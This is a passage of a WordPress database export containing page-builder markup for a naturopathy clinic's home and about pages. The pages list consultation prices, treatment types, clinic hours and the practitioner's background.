Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01-large.png\" title_text=\"1-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 13:06:47','2021-05-27 05:06:47','',28,'https://verdenaturopathy.com.au/?p=208',0,'revision','',0),(211,1,'2021-05-27 13:09:35','2021-05-27 05:09:35','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"> </span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" 